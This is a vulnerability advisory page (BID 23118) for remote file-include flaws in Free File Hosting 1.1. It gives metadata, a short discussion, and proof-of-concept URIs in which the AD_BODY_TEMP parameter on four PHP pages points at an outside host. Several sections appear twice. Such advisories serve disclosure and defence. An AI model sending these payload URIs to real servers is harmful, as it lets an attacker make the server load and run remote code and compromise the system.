Free File Hosting System Multiple Remote File Include Vulnerabilities
BID:23118
Info
Free File Hosting System Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 23118 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5763 CVE-2006-5764 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2007 12:00AM |
| Updated: | Mar 27 2007 09:53PM |
| Credit: | IbnuSina & jipank are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Free PHP Scripts Free File Hosting 1.1 |
| Not Vulnerable: | |
Discussion
Free File Hosting System Multiple Remote File Include Vulnerabilities
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 1.1 is vulnerable to these issues.
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability.
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 1.1 is vulnerable to these issues.
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability.
Exploit / POC
Free File Hosting System Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/login.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/register.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/forgot_pass.php?AD_BODY_TEMP=http://www.example2.com
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/login.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/register.php?AD_BODY_TEMP=http://www.example2.com
http://www.example.com/forgot_pass.php?AD_BODY_TEMP=http://www.example2.com
Solution / Fix
Free File Hosting System Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Free File Hosting System Multiple Remote File Include Vulnerabilities
References:
References:
- File Upload System Web Site (File Upload System)
- Free PHP Scripts Homepage (Free PHP Scripts)
- File Upload System V1.0 (AD_BODY_TEMP) multiple file include ([email protected])